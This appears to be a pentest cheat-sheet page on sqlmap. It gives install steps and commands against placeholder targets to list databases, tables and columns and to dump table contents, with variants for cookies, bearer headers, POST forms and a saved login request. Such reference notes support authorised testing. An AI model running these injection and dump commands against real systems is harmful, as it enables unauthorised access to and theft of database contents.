/security/

Sqlmap

2017-11-28 19:00:01

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections. more here: http://sqlmap.org/

Installation

apt-get install -y sqlmap

Docker image with pre installed tool

(https://hub.docker.com/r/szalek/pentest-tools/)[https://hub.docker.com/r/szalek/pentest-tools/]

docker pull szalek/pentest-tools
docker run -it szalek/pentest-tools

Target

http://target.localhost/rest/ws-user-account.php?username=szalek

Sqlmap basic

sqlmap -u "http://target.localhost/rest/ws-user-account.php?username=szalek" --dbs
sqlmap -u "http://target.localhost/rest/ws-user-account.php?username=szalek" -D {DB\_NAME} --tables
sqlmap -u "http://target.localhost/rest/ws-user-account.php?username=szalek" -T {TABLE-NAME} --columns
sqlmap -u "http://target.localhost/rest/ws-user-account.php?username=szalek" -T {TABLE\_NAME} --dump

with cookie

sqlmap -u "http://target.localhost/rest/ws-user-account.php?username=szalek" --cookie "JSESSIONID=C59D9452BBE59FC357A1D0E62E8646A4" --dbs

with header

sqlmap -u "http://target.localhost/rest/ws-user-account.php?username=szalek" --headers="Authorization: Bearer fyJhabcGiOJI..." --dbs

post

/sqlmap.py -u http://example.com/login.php --data="username=&password=&submit-button=Login" --dbs
./sqlmap.py -u http://example.com/login.php --data="username=&password=&submit-button=Login" -D shop --tables
./sqlmap.py -u http://example.com/login.php --data="username=&password=&submit-button=Login" -T users --dump

post

login_request_dump.txt

POST /login.php HTTP/1.1
Host: 192.168.1.14
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:57.0) Gecko/20100101 Firefox/57.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.14/
Content-Type: application/x-www-form-urlencoded
Content-Length: 26
Connection: close
Upgrade-Insecure-Requests: 1

email=admin&password=admin
sqlmap -r login\_request\_dump.txt -p email
sqlmap -r login\_request\_dump.txt -p password